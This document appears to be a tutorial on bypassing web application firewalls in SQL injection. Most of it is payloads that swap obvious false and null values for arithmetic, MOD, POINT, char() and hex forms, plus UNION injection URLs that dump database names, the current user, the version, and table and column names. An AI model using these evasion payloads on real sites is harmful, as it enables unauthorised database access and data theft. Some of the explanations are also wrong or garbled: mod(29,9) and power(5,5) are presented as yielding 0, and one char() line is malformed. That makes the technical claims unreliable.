The traditional way using And 0
The ordinary usage of And 0 is easily detected by WAF and instantly triggers it, so it becomes impossible to use that query. The examples below describes the traditional way of using an false value in SQL Injection.
1
2
3
4
5
6
And 1=0
And false
And 0
And 1
And 50=60
Any number that are not the same will equal to (0, false, null)
The alternative way of using And 0
The following methods are newly discovered queries which are supported by it’s respective SQL, as a new way of declaring false, null or 0 value(s).
1) Any Mathematical/Arithmetic or Logical Problem that equal to 0
1
2
3
And 1*0
And 1-1
And 0/1
For example:
http://website.com/index.php?id=1’ and 1*0 order by 10–
2) Using MOD()
1
SELECT mod(10, 2);
The used mod() Function will output to 0
For example:
http://website.com/index.php?id=1 and mod(29,9) Order by 10–
3) Using POINT()
1
SELECT point(29, 9);
For example:
http://website.com/index.php?id=1 and point(29,9) Order by 10–
4) Using POWER()
1
SELECT power(5,5);
For example:
http://website.com/index.php?id=1 and power(5,5) Order by 10–
Illegal parameter data types
Error notification Illegal parameter data types INT and row for operation ‘=’, is related to the data type of column included in the condition. The problem can occur because of many reasons.
1) For operation MOD
1
% = Modulo
For example: http://website.com/index.php?id=1 % point(29,9) Order by 10–
2) For operation &
1
2
& = Bitwise And
&& = Logical And
For example:
http://website.com/index.php?id=1 && point(29,9) Order by 10–
3) For operation OR
1
2
| = Bitwise OR
|| = Logical OR, sometimes use for Concatanation
For example:
http://website.com/index.php?id=1 || point(29,9) Order by 10–
The traditional way of using Null
The ordinary usage of Null is easily detected by WAF and instantly triggers it, so it becomes impossible to use that query. The examples below describes the traditional way of using an false value in SQL Injection.
1
Union Select null, null, null, null
The alternative way of using Null
1) Using 0
1
UNION SELECT 0,0,0,0
For example:
http://website.com/index.php?id=1 div 0 Union Select 0,0,0,0 (SELECT+GROUP_CONCAT(schema_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.SCHEMATA),0,0–+”
2) Using false
1
UNION SELECT false,false,false,false
For example:
http://website.com/index.php?id=1 div false Union Select false,false,false,false,SELECT+GROUP_CONCAT(schema_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.SCHEMATA),false–+
3) Using char()
1
2
3
4
UNION SELECT char(null),char(null),char(null),char(null)
UNION SELECT char(false),char(false,char(false),char(false)
UNION SELECT char(0),char(0),char(0),char(0)
UNION SELECT char(0x4e554c4c),char(0x4e554c4c),char(0x4e554c4c),char(0x4e554c4c)
For example:
http://website.com/index.php?id=1 div char(false) Union Select “char(false) div char(false) Union Select char(false),char(false),char(false),char(false),concat(0x222f3e,0x3c62723e,0x3c62723e,’
’,’Database :: ‘,database(),0x3c62723e,’User ::’,user(),0x3c62723e,’Version ::’,version(),0x3c62723e,user(),make_set(6,@:=0x0a, (select(1)from(information_schema.columns)where@:=make_set(511,@,0x3c6c693e,table_name,column_name)),@),0x3c62723e),char(false)–+”,char(false),char(false),char(false),char(false),char(false)–+
4) Using Arithmetic or Logical Operator
1
2
UNION SELECT (0*1337-0),(0*1337-0),(0*1337-0),(0*1337-0)
UNION SELECT 34=35,34=35,34=35,34=35
For example:
1
http://website.com/index.php?id=1 div (0*1337-0) Union Select "(0*1337-0) div (0*1337-0) Union Select (0*1337-0),(0*1337-0),(0*1337-0),(0*1337-0),concat(0x222f3e,0x3c62723e,0x3c62723e,'<br>','Database ::',database(),0x3c62723e,'User :: ',user(),0x3c62723e,'Version ::',version(),0x3c62723e,user(),make_set(6,@:=0x0a, (select(1)from(information_schema.columns)where@:=make_set(511,@,0x3c6c693e,table_name,column_name)),@),0x3c62723e),(0*1337-0)--+",(0*1337-0),(0*1337-0), (0*1337-0),(0*1337-0),(0*1337-0)--+
Bypassing Static Web Application Firewall with 0xHEX values
Since 0xHEX values are accepted and widely used in SQL Queries and Injection payloads, it is a great way to bypass static-based Firewalls. Using this technique, it is possible to avoid using words such as NULL, false, or ‘ (single quotes). Below are existing payload, but their respective values are converted to 0xHEX format.
1
2
3
4
SELECT CHAR(NULL); → SELECT CHAR(0x4e554c4c);
SELECT CHAR(0) → SELECT CHAR(0x30);
SELECT MOD(29, 9); → SELECT MOD(0x3239, 0x34);
SELECT POINT(29, 9); → SELECT POINT(0x3239, 0x39);